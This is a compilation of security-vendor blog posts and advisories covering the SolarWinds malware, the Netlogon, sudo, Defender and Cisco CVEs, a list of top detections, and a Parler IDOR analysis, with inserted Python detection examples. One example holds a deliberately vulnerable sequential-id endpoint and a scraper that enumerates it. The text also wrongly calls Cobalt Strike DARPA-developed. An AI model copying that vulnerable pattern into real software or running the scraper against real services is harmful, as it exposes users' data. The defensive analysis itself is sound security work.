    The term “malware” (short for “Malicious Software”) describes the software that is used to compromise or cause damage to a system or network. Essentially, malware is code with a malicious intent. The threat actor(s) that conducted the SUNBURST attack didn’t just use one piece of malware to achieve their objectives. They developed multiple types of malware for the SolarWinds attack, and the handful that researchers have identified so far certainly don’t fit into any one category by themselves. Malware taxonomy is the science of the classification of malware. I may be on my way to becoming a malware taxonomist, but I’ll try to make this quick and painless for us all, at least with this introduction.

    The intention of this post is to give you a quick summary of the various pieces of malware that allowed the threat actors behind this supply-chain attack against SolarWinds to be successful while remaining undetected. For months, the threat actors that leveraged the supply chain attack against SolarWinds penetrated and remained undetectable against some of the world’s most secure networks. SUNSPOT, SUNBURST, SUPERNOVA, TEARDROP, and RAINDROP have been identified by researchers to be specific pieces of malware that worked together to act as a backdoor into a SolarWinds update framework.

    SUNSPOT was the implant that allowed the threat actor the ability to inject the SUNBURST backdoor code into the software update pipeline. It’s also how threat actors added their malicious code to SolarWinds updates that were later deployed to SolarWinds customers. When executed, SUNSPOT ensures that only one instance of itself is running, and then creates an encrypted log file at C:\Windows\Temp\vmware-vmdmp.log.

    SUNBURST was the backdoor patched into a SolarWinds update that remained dormant for up to two weeks after installation before reaching out to its command and control (C2) servers via HTTP to a subdomain of avsvmcloud[.]com.

    TEARDROP was a memory-only dropper, or downloader malware, with the sole function of stealthily downloading and installing additional malware components. It ran as a service and was used to deploy Cobalt Strike Beacon. Cobalt Strike is a DARPA developed, military-grade attack framework designed to be both incredibly stealthy and malleable to allow for emulation of various types of command and control communication.

    SUPERNOVA was a web shell seemingly designed to maintain persistent access to the system. SUPERNOVA created a stealthy and complete .NET Application Programming Interface (API) within an Orion binary. SUPERNOVA achieves stealth by operating entirely in memory, which makes detection much more difficult. SUPERNOVA was placed on systems by the threat actors after the initial breach and was not part of the embedded SUNBURST payload, unlike the three components described above.

    RAINDROP was similar to TEARDROP, in that it dropped a custom payload of Cobalt Strike Beacon onto systems that it infected, but different in that it was not part of the initial SUNBURST backdoor delivery. RAINDROP achieved stealth by leveraging SMB-based named pipes to establish internal peer-to-peer networks between infected hosts. Notably, this minimized the number of hosts required to beacon out, and helped the threat actor remain undetected.

    There’s more to come with these posts about the malware that’s been identified to be associated with the SUNBURST attack, and surely more to come to the story as a whole. This advanced persistent threat (APT) actor is being referred to and/or tracked by a few different names: UNC2452, StellarParticle, Dark Halo, and SolarStorm. Most folks in the industry are convinced that this APT is part of an organized nation-state attack. The threat actors behind the attack that targeted public and private organizations across the world have not been publicly identified. The grapevines have been whispering, and research has been suggesting links to Russian involvement.

    Adopting a Defense in Depth detection strategy can help increase the likelihood of detecting such stealthy threat actors. Though we certainly have a “new normal” in cybersecurity, it’s an ever-evolving world that we live in: both in and outside of cyberspace. We need to secure ourselves, in-depth. Become aware… and maybe even become aware how to be aware. That includes a solution to ensure you have the required visibility into your environment and know how to appropriately respond to threats and vulnerabilities.

    At Blumira, our clients benefit from economies of scale when it comes to detections. Our team works tirelessly to emulate, test, and detect bad actors and guide you to taking appropriate action when anomalies are found.

    Critical
    February 1, 2021

    Microsoft to Enable Domain Controller Enforcement Mode by Default on Feb. 9


    What Happened

    When CVE-2020-1472 was released on Aug 11, 2020, Microsoft addressed a critical remote code execution vulnerability targeting how the Netlogon secure channel is used. The patch is being released in two separate parts. The initial deployment on Aug 11 covered:

    1. Fixing the vulnerability for all Windows domain-joined devices.
    2. Logging events for all non-compliant devices.
    3. Introducing the option to enable protection for all domain-joined devices, as well as explicit exceptions, via group policy.

    The second half of this deployment will take place beginning with the February 9 security update. During this update, the DC (domain controller) enforcement mode will be enabled by default on all devices.

    What That Means

    The Remote Code Execution category of vulnerabilities is almost always critical priority, especially those that need no authentication. The Netlogon Remote Protocol (MS-NRPC) is used by AD (Active Directory) domains and includes an authentication method as well as the ability to create a Netlogon secure channel. The exploit takes advantage of this authentication and allows the escalation of privileges. The attacker can impersonate the machine account and set a known or empty password for the account.

    This attack can be used to obtain full domain administrator privileges, specifically with the spoofing of the domain controller computer account, leading to a full compromise of the domain. There are several proofs of concept out for this attack currently.

    What You Should Do

    There are four steps recommended by Microsoft as well as changes we’ve made to help:

    1. Update your domain controllers with the patch that was released on August 11. (And keep your DCs and all Windows hosts up to date otherwise)
    2. Find which devices are making vulnerable connections by monitoring event logs (Blumira can help with this part!!) See how we integrate with Microsoft Windows Server.
    3. Address the non-compliant devices
    4. Enable DC enforcement mode if all non-compliant devices have been addressed prior to Feb 9

    From within Blumira, as long as domain controllers are sending System event logs, you can select the global report named “Netlogon Secure Channel Connections” to see if there are any impacted devices still using the insecure channels. We’ve also created a High-Priority Risk finding called “Netlogon Secure Channel Connection Vulnerability Detected.”
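    As an added example (not Blumira's report logic and not code from the original post), here is a Python triage of step 2 above done directly on domain controller System-log events. The event IDs are the NETLOGON events Microsoft documents for CVE-2020-1472, which this post does not list, so treat them as an assumption to verify against Microsoft's guidance; the event shape (source, event_id, account) is constructed, and you would map your collector's field names onto it. The point of the bucketing is to separate devices that will break on Feb 9 from devices covered by a group policy exception and devices already being denied.

```python
from collections import defaultdict

# Event IDs below are Microsoft's documented Netlogon events for CVE-2020-1472
# (assumed here; the post itself only refers to "event logs"). They are logged
# to the System log with source NETLOGON on each domain controller.
ALLOWED_VULNERABLE = {5829}        # vulnerable connection allowed today; denied once enforcement mode is on
ALLOWED_BY_POLICY = {5830, 5831}   # allowed only because a group policy exception names the account
DENIED = {5827, 5828}              # vulnerable connection already denied (machine / trust account)


def triage_netlogon_events(events):
    """Bucket NETLOGON events by the account that made the connection.

    Input is a list of dicts with keys source, event_id and account (a
    constructed shape; map your log collector's field names onto it).
    """
    report = {
        "will_break_on_feb_9": defaultdict(int),  # fix or add an exception before enforcement
        "allowed_by_policy": defaultdict(int),    # review: exceptions should be temporary
        "already_denied": defaultdict(int),       # these devices are failing now
    }
    for ev in events:
        if ev.get("source") != "NETLOGON":
            continue
        eid = ev["event_id"]
        acct = ev.get("account", "<unknown>")
        if eid in ALLOWED_VULNERABLE:
            report["will_break_on_feb_9"][acct] += 1
        elif eid in ALLOWED_BY_POLICY:
            report["allowed_by_policy"][acct] += 1
        elif eid in DENIED:
            report["already_denied"][acct] += 1
    return {bucket: dict(counts) for bucket, counts in report.items()}


def ready_for_enforcement(report):
    """True when no device still relies on an insecure channel without an explicit exception."""
    return not report["will_break_on_feb_9"]


# Constructed sample: a NAS still using the insecure channel, a printer covered
# by a policy exception, a legacy box already being denied, and unrelated noise.
SAMPLE_EVENTS = [
    {"source": "NETLOGON", "event_id": 5829, "account": "NAS01$"},
    {"source": "NETLOGON", "event_id": 5829, "account": "NAS01$"},
    {"source": "NETLOGON", "event_id": 5830, "account": "PRINTER7$"},
    {"source": "NETLOGON", "event_id": 5827, "account": "LEGACY-XP$"},
    {"source": "Service Control Manager", "event_id": 7036, "account": "n/a"},
]

if __name__ == "__main__":
    rep = triage_netlogon_events(SAMPLE_EVENTS)
    for bucket, counts in rep.items():
        print(f"{bucket}: {counts}")
    print("ready for enforcement mode:", ready_for_enforcement(rep))
```

    Run it against the events from every domain controller, not just one: a device that authenticates against a different DC will only show up in that DC's System log.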

    Who’s Impacted

    Any Windows Server 2012 and above devices are impacted.

    Additional Resources:

    To help organizations running Microsoft environments, our guide gives you practical, step-by-step Windows tips to significantly improve your visibility into malicious activity. Download our Guide to Microsoft Security.

    Low
    January 28, 2021

    Top 10 Security Detections of 2020


    Blumira wanted to begin the year with a recap of how last year looked regarding the number of detections across our customers’ networks. The detections (findings, as we call them around here) found in this list are the findings we don’t consider to be operational. If we were to include our customer-specific operational findings to this list, account lockouts would take the number one spot, easily!

    The goal of this article is to show our readers what we’re seeing on the attack surface. Some of the detections in this list are as simple as alerting on critical alerts from various data sources such as antivirus products, firewalls, etc., while others are very complex in their nature, relying on counting, timings, and a ton of regex (fun stuff).


    Without further ado, here are the top 10 detections we saw in 2020 based off of how many findings they triggered across the Blumira customer base.

    Public to Private Recon in Individual Connections

    This Finding indicates an attacker is attempting to enumerate services that are exposed to the internet. As this only matches when traffic is allowed, this means that either the firewall is set up to allow all traffic, or, the source attacker has found services that are allowed through the firewall and may be leveraged further.

    Anomalous Honeypot Access

    This indicates that you have an endpoint that is actively attempting to gain information about a honeypot and is likely unaware of its nature. When a honeypot detection occurs, unless the host is a known actor, the source should be acted upon immediately.

    Regsvr32 Malicious DLL

    Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls. It can also be used to specifically bypass process allowlisting. Malicious activity or users may take advantage of this functionality to avoid being detected by endpoint solutions because of allowlists or false positives from Windows using regsvr32.exe for normal operations.

    2FA (Two-Factor) Authentication Outside of U.S.

    Self-explanatory detection here. We often employ customer allowlists to cut down on false-positives caused by remote workers. Whether we’ve detected a user unexpectedly out of the country or a malicious user that gained some sort of access to a username, this finding has been very helpful and highly accurate.

    Potentially Malicious Executable File

    We lean heavily on endpoint security for this one. Our goal here was to bridge the gap between as many next-generation endpoint solutions as possible. We alert on high-confidence alerts from most of these endpoint solutions with this single detection.

    Internal Password Spraying

    When you see this finding, our best security practice recommendation is to go figure out what’s going on as soon as possible. This detection alerts our customers that a single endpoint is attempting to spray the network with random passwords. If one of these random password authentication attempts is successful, it can lead to endpoint compromise, privilege escalation, etc.

    Anomalous Server Path Access

    This often indicates that an attacker is attempting to enumerate paths across an internal host, in an attempt to find vulnerable or interesting objects on the server. The thresholds for this detection generally avoid scanning bots; however, in some cases, this detection may trigger on bots scanning for known web shells already sitting on hosts. Where these detections come from such bots rather than targeted attacks, the sources should be broadly blocked where possible, e.g., if the traffic originates from China, block Chinese traffic.

    Administrator-Level Account Addition

    This one in particular can be considered an operational finding that I was attempting to leave off of this list, but it’s not a daily finding your organization should be seeing. When this event occurs, you should think of this as a “sound the alarms” moment where you should be dropping everything to verify with the source user that this administrative-level account addition was expected. Sometimes it’s not a malicious action, rather an accidental one which would still warrant action on the account.

    Null Session Activity

    This alert identifies when a single device is contacting multiple devices anonymously to administrative shares. This is usually a tactic used in information gathering prior to an attack. We recommend tracking down {client_ip} and seeing if this is normal activity or disabling the access for this device. We also recommend disabling null sessions whenever possible – here’s guidance on how to disable null sessions in Windows.

    25 Windows Account Lockouts in 12 hours

    This event has historically been a direct result of Password Spraying like we saw above. Unless you have a very large network, this detection is a rare false positive. This should be correlated with the source machine performing the logins.
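    As an added example (not Blumira's detection rules and not code from the original post), here is how the two threshold findings above, Internal Password Spraying and 25 Windows Account Lockouts in 12 hours, can be expressed over Windows Security events in Python. It uses event 4625 (failed logon) and 4740 (account locked out); the lockout numbers come from the post, while the spray threshold (10 distinct accounts within 10 minutes from one source) is an assumption you would tune for your own environment. The events are constructed, and the lockout rule also returns counts per caller computer so the finding can be correlated with the source machine as the post recommends.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Windows Security event IDs: 4625 = failed logon, 4740 = account locked out.
# The spray thresholds are assumptions; the lockout rule uses the post's own
# numbers (25 lockouts in 12 hours).
SPRAY_MIN_ACCOUNTS = 10
SPRAY_WINDOW = timedelta(minutes=10)
LOCKOUT_THRESHOLD = 25
LOCKOUT_WINDOW = timedelta(hours=12)


def _busiest_window(times, window):
    """Largest number of timestamps that fit inside one sliding window."""
    times = sorted(times)
    best, j = 0, 0
    for i in range(len(times)):
        while j < len(times) and times[j] - times[i] <= window:
            j += 1
        best = max(best, j - i)
    return best


def detect_internal_spray(events, min_accounts=SPRAY_MIN_ACCOUNTS, window=SPRAY_WINDOW):
    """Flag a source that fails logons against many *distinct* accounts in one window.

    Returns {source: distinct_accounts} for sources that cross the threshold.
    """
    by_source = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4625:
            by_source[ev["source"]].append((ev["ts"], ev["target"]))
    alerts = {}
    for src, items in by_source.items():
        items.sort()
        j = 0
        for i in range(len(items)):
            while j < len(items) and items[j][0] - items[i][0] <= window:
                j += 1
            distinct = {user for _, user in items[i:j]}
            if len(distinct) >= min_accounts:
                alerts[src] = max(alerts.get(src, 0), len(distinct))
    return alerts


def detect_lockout_burst(events, threshold=LOCKOUT_THRESHOLD, window=LOCKOUT_WINDOW):
    """The '25 lockouts in 12 hours' rule; also returns lockouts per caller computer
    so the finding can be correlated with the machine performing the logins."""
    lockouts = [ev for ev in events if ev["event_id"] == 4740]
    peak = _busiest_window([ev["ts"] for ev in lockouts], window)
    by_caller = defaultdict(int)
    for ev in lockouts:
        by_caller[ev["source"]] += 1
    return peak >= threshold, peak, dict(by_caller)


def build_sample_events():
    """Constructed events: one workstation sprays 30 accounts and 26 of them lock,
    plus a user mistyping their own password a few times from another host."""
    base = datetime(2021, 1, 28, 8, 0, 0)
    events = []
    for k in range(30):
        events.append({"ts": base + timedelta(seconds=20 * k), "event_id": 4625,
                       "source": "WS-117", "target": f"user{k:02d}"})
    for k in range(26):
        events.append({"ts": base + timedelta(seconds=20 * k + 5), "event_id": 4740,
                       "source": "WS-117", "target": f"user{k:02d}"})
    for k in range(3):
        events.append({"ts": base + timedelta(minutes=k), "event_id": 4625,
                       "source": "WS-042", "target": "alice"})
    return events

if __name__ == "__main__":
    evs = build_sample_events()
    print("internal spray:", detect_internal_spray(evs))
    print("lockout burst:", detect_lockout_burst(evs))
```

    The spray rule keys on distinct target accounts rather than raw failure count, which is what keeps one user fat-fingering their own password (WS-042 here) from tripping it.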

    Prioritizing Key Security Findings to Reduce Noise

    You may notice half of these detections are sourced from the internet. We don’t alert on every scan from the outside world by default, rather, we find a ton of value in letting our customers know when there appears to be a sophisticated reconnaissance attempt or attack happening against their network. If we were to alert on all scanning from the internet, there would be hundreds of findings a day for each one of our customers. One of Blumira’s top priorities with detections is to be accurate and discreet. If a customer is interested in seeing scanning from the network, we have no problem putting a detection rule together, but we inherently don’t prefer to deploy that detection by default.

    We have caught many talented penetration testers and hackers using most of these Top 10 detections. Although they may be some of the most triggered findings, our Internal Password Spraying and Anomalous Access detections seem to be an attacker’s worst nightmare. We have heard firsthand from red teams that they’ve never seen some of these findings on previous penetration tests, whether a SIEM solution was present or not.

    These remarks are what keep our Incident Detection Engineering team going. We in the Blue team world know that the Red team as well as attackers have the upper hand in this fight against network exploitation, but with Blumira deployed, you can rest easy knowing our detections can catch early stage attacks.

    Test it out yourself with a free trial of Blumira’s cloud SIEM.

     


    Critical
    January 27, 2021

    Update Blumira Sensors: Sudo Privilege Escalation (CVE-2021-3156)

    What Happened?

    On January 26, a new critical vulnerability in the Sudo binary across nearly all Linux hosts was disclosed. Known as CVE-2021-3156, this vulnerability potentially allows an attacker to leverage the Sudo binary to gain root privileges by passing certain characters on the command line. Over the years there have been a number of Sudo-related vulnerabilities; in this case, however, it can only be leveraged in non-standard configurations.

    Who’s Affected?

    Currently, all versions of Sudo that are identified below are known to be vulnerable to this local privilege escalation vulnerability.

    • All legacy versions from 1.8.2 to 1.8.31p2
    • All stable versions from 1.9.0 to 1.9.5p1

    Updating Sudo

    If your Blumira Sensor is set up per Blumira guidance, you are likely utilizing the unattended security updates feature of Ubuntu, and Sudo should have been updated last night.

    If you did not enable unattended security updates or are not sure, below you will find commands to determine state and update if need be.

    Patched Sudo Versions – Ubuntu

    Operating System                          Patched Sudo Version
    Ubuntu 18 LTS (Blumira Sensor)            1.8.21p2
    Ubuntu 20 LTS (Alternate Blumira Sensor)  1.8.31-1ubuntu1.2

    See details in Ubuntu’s security notice.

    Validating Sudo Version

    Log in to your Blumira Sensor over SSH or however you access your Sensors generally. Run the command sudo --version to determine current state.


    $ sudo --version
    Sudo version 1.8.21p2
    Sudoers policy plugin version 1.8.21p2
    Sudoers file grammar version 46
    Sudoers I/O plugin version 1.8.21p2

    Updating Sudo

    Updating Sudo is a simple process; feel free to run this even if you think your machine updated last night with unattended upgrades.

    You can additionally validate your unattended upgrades by reviewing the contents of the logs, tail -n 25 /var/log/unattended-upgrades/unattended-upgrades.log.

    For updating your Sudo binary itself, you only need to run sudo apt update && sudo apt install sudo. Below is an example of an already updated Ubuntu 18 LTS Blumira Sensor.


    $ sudo apt update && sudo apt install sudo
    Hit:1 http://us.archive.ubuntu.com/ubuntu bionic InRelease
    Hit:2 http://us.archive.ubuntu.com/ubuntu bionic-updates InRelease
    Hit:3 http://us.archive.ubuntu.com/ubuntu bionic-backports InRelease
    Hit:4 http://us.archive.ubuntu.com/ubuntu bionic-security InRelease
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    68 packages can be upgraded. Run 'apt list --upgradable' to see them.
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    sudo is already the newest version (1.8.21p2-3ubuntu1.4).
    sudo set to manually installed.
    The following packages were automatically installed and are no longer required:
    linux-headers-4.15.0-118 linux-headers-4.15.0-118-generic linux-image-4.15.0-118-generic linux-modules-4.15.0-118-generic linux-modules-extra-4.15.0-118-generic
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 68 not upgraded.

    Critical
    January 25, 2021

    SonicWall Privilege Escalation: CVE-2020-5144


    As of late Friday morning, SonicWall was in the early stages of advising its customers of a breach which may have impacted its security products. While initial reports indicated a wide range of potentially impacted products across the SonicWall product line, this was later clarified to just the SMA (Secure Mobile Access) 100. The SMA 100 is an appliance which is intended to provide secure access to data center, cloud, and SaaS (software as a service) resources from a single portal.

    The announcement came four days after proof of concept (POC) exploit code for CVE-2020-5144 was released, which describes exploitation of the SonicWall Global VPN Windows client for privilege escalation by leveraging a vulnerability that allowed the executable search order to be hijacked. This would allow an ordinary user to elevate their permissions to SYSTEM (administrative-level privileges).

    Early this Monday morning, Darren Martyn, a security researcher, released a previously unpublished exploit against SonicWall SSL-VPN (which includes the firewall line). This particular method of exploitation was leveraged during the Hacking Team data breach and allowed the threat actor in that instance to not simply gain remote access to the device, but also add code to the login page to capture usernames and passwords.

    What Should I Do if I’m a SonicWall Customer?

     

    Low
    January 13, 2021

    Security Analysis of the Parler Data Dump

    Summary

    It is important to note that high-level data leaks tend to come with large amounts of misinformation, especially when there’s great interest from the outside. In this case, it is difficult to ascertain if there was a proper ‘hack’ that took place or if Parler was inherently insecure.

    In this case, Parler had a few failures, some long-standing and others caused by poor engineering – that culminated in a number of potential exposures and a full scrape of attachments on Parler, a social networking company. These types of attacks can occur against all organizations that expose themselves to the internet. In no case has there been any proof that Parler itself was “hacked” but rather was inherently insecure. It appears that their weak security was leveraged by offensive parties across the world prior to shutting down.

    This is also the first large-scale hacktivism movement we’ve seen in a while. While 2020 saw a few leaks (BlueLeaks and DDoSecrets), this is a very fast and significant entry into 2021. These incursions can be broad and generally expose vast amounts of data that capture the public’s attention for a prolonged period of time as information is slowly divulged.

    What Happened

    Parler improperly allowed mass collection of archived data (images, videos, information) that were posted onto their service. This was due to an unprotected API call that was sequentially numbered, therefore allowing any attacker to iterate continuously over the endpoint and take all information available – which is reaching upwards of 60TB now with over one million videos alone.

    By having no security protections on who can iterate these endpoints, nor any rate-limiting protections, the internet was generally able to capture all data available. This culminated in the gathering of over 60TB of data with massive amounts of metadata: well over 1,400 unique types of data connected to the accessed data, ranging from geolocation to the type of phone used.

    For example, if you have a corporate website and you store your PDFs numbered at http://www.acme.com/pdfs/1.pdf, that would allow an attacker to then guess the correct URL structure for 2.pdf, 3.pdf, and so on and so forth until they are detected and stopped, or they divulge all the information that they desire. In the case of Parler, their URLs looked like https://par(dot)pw/v1/photo?id= and the ID could be sequentially increased to gather information from the API without direct knowledge.

    From a defensive security perspective, this is a failure covered by the OWASP Top 10, which defines web application security best practices. Specifically, this is an Insecure Direct Object Reference (IDOR) attack, which enumerates across all data available.
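    As an added example (not Parler's code and not code from the original post), the Python below puts the IDOR pattern described above beside a hardened version of the same lookup, and adds the detection side. The store, the photo records and the access log are all constructed. The vulnerable handler takes a sequential integer id straight from the request with no caller check, which is exactly what lets one loop walk every object; the hardened handler keys objects by a random 128-bit token and still checks that the authenticated caller owns the record, returning the same answer for "missing" and "not yours" so the endpoint does not become an oracle for which ids exist. The detector flags a client that requests many ids that are mostly consecutive, the behavior a rate limit alone will not distinguish from a busy legitimate user.

```python
import hmac
import secrets
from collections import defaultdict


class AttachmentStore:
    """Constructed in-memory store standing in for the photo storage behind the API."""

    def __init__(self):
        self._by_seq = {}     # sequential id -> record (the Parler-style key)
        self._by_token = {}   # random token -> record (the hardened key)
        self._next_seq = 1

    def add(self, owner, blob):
        rec = {"owner": owner, "blob": blob,
               "seq": self._next_seq,
               "token": secrets.token_urlsafe(16)}  # 128 bits of randomness: not guessable
        self._by_seq[rec["seq"]] = rec
        self._by_token[rec["token"]] = rec
        self._next_seq += 1
        return rec["seq"], rec["token"]


def get_photo_vulnerable(store, photo_id):
    """The IDOR pattern: integer id straight from the query string, no caller check."""
    rec = store._by_seq.get(photo_id)
    return rec["blob"] if rec else None


def get_photo_hardened(store, caller, token):
    """Unguessable id *and* an ownership check against the authenticated caller.

    'Missing' and 'not yours' both return None so the endpoint is not an oracle
    for which ids exist.
    """
    rec = store._by_token.get(token)
    if rec is None or not hmac.compare_digest(rec["owner"], caller):
        return None
    return rec["blob"]


def scrape_vulnerable(store, start, stop):
    """What iterating the vulnerable endpoint yields: every stored object in the range."""
    return [blob for blob in (get_photo_vulnerable(store, i) for i in range(start, stop + 1))
            if blob is not None]


def flag_enumerators(access_log, min_requests=20, min_sequential=0.8):
    """Detection side: flag clients that request many ids, mostly consecutive.

    access_log is an iterable of (client, id) pairs in arrival order (constructed here);
    the thresholds are assumptions to tune per service.
    """
    by_client = defaultdict(list)
    for client, photo_id in access_log:
        by_client[client].append(photo_id)
    flagged = {}
    for client, ids in by_client.items():
        if len(ids) < min_requests:
            continue
        steps = sum(1 for a, b in zip(ids, ids[1:]) if b == a + 1)
        ratio = steps / (len(ids) - 1)
        if ratio >= min_sequential:
            flagged[client] = ratio
    return flagged


def build_demo_store():
    store, tokens = AttachmentStore(), {}
    for owner in ("alice", "bob", "carol"):
        _, tokens[owner] = store.add(owner, f"{owner}-photo".encode())
    return store, tokens


# Constructed access log: one client walks ids 1..30, another fetches its own photo twice.
SAMPLE_ACCESS_LOG = [("203.0.113.7", i) for i in range(1, 31)] + [("10.1.1.4", 2), ("10.1.1.4", 2)]

if __name__ == "__main__":
    store, tokens = build_demo_store()
    print("vulnerable endpoint leaks:", scrape_vulnerable(store, 1, 30))
    print("hardened, wrong caller:", get_photo_hardened(store, "mallory", tokens["alice"]))
    print("hardened, owner:", get_photo_hardened(store, "alice", tokens["alice"]))
    print("flagged clients:", flag_enumerators(SAMPLE_ACCESS_LOG))
```

    Note that the random token alone is not the fix: without the ownership check, a leaked or shared token still exposes the object to anyone who has it, which is why the hardened handler does both.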

    Additionally, when Twilio, a third-party service for user authentication pulled out, it appears users were able to create Parler accounts without having to verify their email.

    How Does Blumira Detect These Attacks?

    Blumira detects these types of attacks by looking for anomalous behavior in how one or many IPs are connecting to a host and attempting to access unique paths on the host. Relying on pure rate limiting, or on third-party services that can cancel your service, can leave you insecure or shut down, as seen in recent news.

    Depending on services for two-factor authentication (2FA) and email verification may also result in potential risk, as seen when Twilio cancelled their support. Additionally, changes in authentication due to fail-open behavior (e.g., we can no longer access 2FA, therefore all valid authentications are allowed) form a detectable and useful recurring Scheduled Report pattern for organizations to review consistently. Have your Okta authentications changed broadly over time due to a change in service? Blumira’s platform provides scheduled reporting to help surface these security trends for organizations.

    Attacks like the one performed against Parler are what would be considered a failure at the application security level, as their service was engineered improperly and not tested for security. Blumira considers detections like these to be useful not only from a “stop the attacker” perspective, but also as teaching tools for organizations’ development teams.



    Critical
    January 12, 2021

    Critical Microsoft Defender Vulnerability (CVE-2021-1647)


    Microsoft’s Patch Tuesday monthly security patches include a critical patch for Microsoft’s Defender antivirus, which was reportedly exploited prior to this patch being released. Exploitation of this vulnerability will allow an attacker to execute malicious code on vulnerable devices where Defender is installed.

    Details at a glance: CVE-2021-1647

    • This vulnerability has been exploited in the wild.
    • Low or no privileges are required for attack success.
    • User interaction is not required.
    • There is a critical impact to confidentiality, availability, and integrity of exploited systems.

    Mitigation Guidance

    1. Details of exploitation are extremely sparse: while Microsoft’s guidance did indicate exploitation, no details have been provided as of yet.
    2. Microsoft reports that proof of concept (POC) exploit code is available, and it will likely be further developed and refined.
    3. Impacted versions of Windows include Windows 7 to Windows Server 2016.
    4. A patch is available. Microsoft has released patches for all impacted operating systems. You should evaluate and prioritize patching critical systems. While the vector of this attack is considered “local” due to being file based, Microsoft Exchange and other public-facing services should be prioritized to be patched first, as they likely have the greatest exposure to exploitation.

    For additional information on how to patch this vulnerability please refer to:
    https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647

    Medium
    December 14, 2020

    What You Need to Know: SolarWinds Supply Chain Malware Campaign


    Over the weekend, major news broke about a global supply chain attack campaign by a nation-state that targeted government, consulting, tech, telecom and other entities in North America, Europe, Asia and the Middle East. The campaign may have started as early as Spring 2020 and is ongoing.

    Most notable targets include the U.S. Treasury Dept., Dept. of Homeland Security, and the Dept. of Commerce’s National Telecommunications and Information Administration (NTIA), the agency responsible for creating internet and telecommunications policy.

    How Did It Happen?

    FireEye has a very detailed technical write up that explains their findings in depth, but here’s a brief summary:

    SolarWinds, a provider of IT monitoring and management software, was exploited by the attackers. They gained access through malicious updates delivered by SolarWinds’ Orion software. Attackers used a number of techniques, including:

    • Using a backdoor to communicate to third-party servers
    • Hiding its network traffic as an Orion protocol
    • Storing reconnaissance information within legitimate plugin config files
    • Hiding malicious traffic to command and control (C2) domains as normal SolarWinds API communications
    • Gaining access to networks with compromised credentials
    • Moving laterally within environment using many different credentials

    According to Reuters, the attackers gained access to the NTIA’s staff email system, Microsoft’s Office 365. They monitored agency emails for several months. Microsoft has also provided a customer advisory with information on indicators of compromise and recommended defenses to protect against and monitor anomalous logins for Azure Active Directory.

    Who’s Affected?

    Any organization using Orion versions 2019.4 through 2020.2.1, released between March 2020 and June 2020, is affected by the malicious updates. FireEye has named this malware SUNBURST, while Microsoft dubbed it Solorigate, as reported by ZDNet.

    How to Mitigate

    SolarWinds recommends organizations upgrade to Orion Platform version 2020.2.1 HF 1 as soon as possible (available in their customer portal).

    An additional hot fix release will be available Tuesday, Dec. 15. They recommend customers update to 2020.2.1 HF 2 as soon as it’s available, since it will both replace the compromised component and provide additional security enhancements, according to their security advisory.

    Who Performed the Attack?

    The intrusion campaign, suspected by some to be APT29/COZYBEAR, shows several characteristics of an Advanced Persistent Threat, or the like, including state-sponsorship. Let’s step through a few of the indicators:

    1. Strategic Targeting – It takes a considerable resource-commitment to stealthily compromise both an organization’s network and, more impressively, the global software update system of its core product. Embedding malicious code within their standard releases means the attacker likely reverse-engineered the legitimate code in order to subtly blend in its own malware while maintaining application functionality. Typically, that would entail a development team in addition to a network intruder. Pursuing a supply chain attack against SolarWinds meant global access to agencies and corporations, which meets the definition of strategic targeting.
    2. Sophisticated Command and Control – Yet another sign of sophistication was the attacker’s choice to co-opt the product’s own proprietary HTTP protocol variant for C2 purposes. Here again, defensive evasion was clearly at the forefront of the attacker’s mind, which is a classic example of sophistication. Deconstructing the network protocol would be necessary first before the malware could make use of it for emulation purposes and incorporate steganography. The latter two qualities typically entail a development team directly supporting the intrusion campaign.
    3. Advanced Tradecraft – The threat actor went to the time, trouble, and expense of setting up C2 infrastructure in-country to help obfuscate the malware’s C2 channels. Many firewalls are configured for geo-blocking per policy as a means of risk reduction, making this extra step by the threat actor necessary. If an organizer’s user base or business needs are exclusively in-country, this can be an effective control. While the aforementioned steps don’t require technical sophistication, the extra precaution could be interpreted as advanced computer network exploitation tradecraft. It’s yet another indication of how well-planned the entire intrusion campaign appears to have been in contrast to a script kiddie or the like. The attacker designed the entire campaign (supply chain targeting, lightweight backdoor malware, light footprint post-compromise behavior, disciplined operational tempo, and co-opted C2 traffic) with operational security in mind, likely to allow sufficient time for Actions on Objectives.

    Detection Opportunities

    Ideally, SolarWinds customers should configure their firewalls to only allow outbound SolarWinds device traffic to the vendor’s update servers, or, at worst, an explicit netblock. Doing so likely would’ve prevented the threat actor from gaining downstream device access to SolarWinds’ customers via the update known as Jobs. Also, customers should consider adopting an endpoint detection and response (EDR) solution, such as Sysmon, for better continuous operational visibility into DNS behavior.

    Learn more in How to Enable Sysmon for Windows Logging and Security.

    Security Recommendations

    FireEye’s blog post provides immediate mitigation techniques to help organizations address the SolarWinds software risks, summarized below:

    • Isolate SolarWinds servers and ensure they’re contained until an investigation is conducted – this includes blocking all Internet access from SolarWinds servers
    • Change passwords for accounts with access to SolarWinds servers and infrastructure
    • If you’re using SolarWinds for managed networking infrastructure, review your network device configurations for unauthorized modifications
    • If SolarWinds infrastructure isn’t isolated, consider limiting the scope of SolarWinds server connectivity to endpoints; limiting the scope of accounts with local admin privileges on SolarWinds servers, and blocking internet access from servers or other endpoints with SolarWinds software

    Critical
    November 9, 2020

    Cisco AnyConnect VPN Zero-Day (CVE-2020-3556)

    Last week, Cisco disclosed a zero-day vulnerability (CVE-2020-3556) that has proof-of-concept exploit code publicly available.

    Last week, Cisco disclosed a zero-day vulnerability (CVE-2020-3556) that has proof-of-concept exploit code publicly available. It affects their AnyConnect Secure Mobility Client software, an endpoint tool that connects users to enterprise networks via virtual private network (VPN). The vulnerability was reported by Gerbert Roitburd from Secure Mobile Networking Lab (TU Darmstadt).


    How It Works

    A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client allows an authenticated, local attacker to execute malicious scripts in the context of a targeted user.

    Because the IPC listener performs no authentication, an attacker could exploit this vulnerability by sending IPC messages to the AnyConnect client IPC listener, resulting in script execution with the privileges of the targeted AnyConnect user, according to Cisco.

    For successful exploitation, an attacker would need valid user credentials of the system running the AnyConnect client. They would also need to log into the system during an active AnyConnect session, and gain access to privileges to execute code on that system.

    Who is Affected

